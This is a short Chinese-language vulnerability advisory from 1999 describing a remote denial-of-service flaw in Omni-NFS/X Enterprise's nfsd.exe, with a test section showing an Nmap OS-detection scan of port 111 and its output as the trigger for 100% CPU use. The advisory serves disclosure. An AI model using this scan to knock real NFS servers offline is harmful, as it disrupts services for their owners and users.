Omni-NFS/X企业级(nfsd.exe)存在拒绝服务攻击发布时间:1999-10-09 更新时间:1999-10-09 严重程度:中 威胁程度:远程拒绝服务 错误类型:设计错误 利用方式:服务器模式 受影响系统 Misc详细描述 Omni-NFS/X Enterprise是一个为WIN32系统提供Xserver 和NFS服务的解决方案。此程序由Xlink Technology公司所写,其中存在一个允许恶意者进行一个DOS拒绝攻击服务的漏洞,引起服务器停止响应。 测试代码 你如果使用Nmap带-O或者-sS(TCP SYN扫描--半带开扫描) 扫描由OMNI-NFS/X使用NFS(nfsd.exe)会耗尽100%的CPU资源如: $ nmap -O -p 111 slacky Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on slacky (192.168.1.2): Port State Protocol Service 111 open tcp sunrpc TCP Sequence Prediction: Class=trivial time dependency Difficulty=2 (Trivial joke) Remote operating system guess: Windows NT4 / Win95 / Win98 Nmap run completed -- 1 IP address (1 host up) scanned in 1 second 解决方案 暂无 相关信息 |
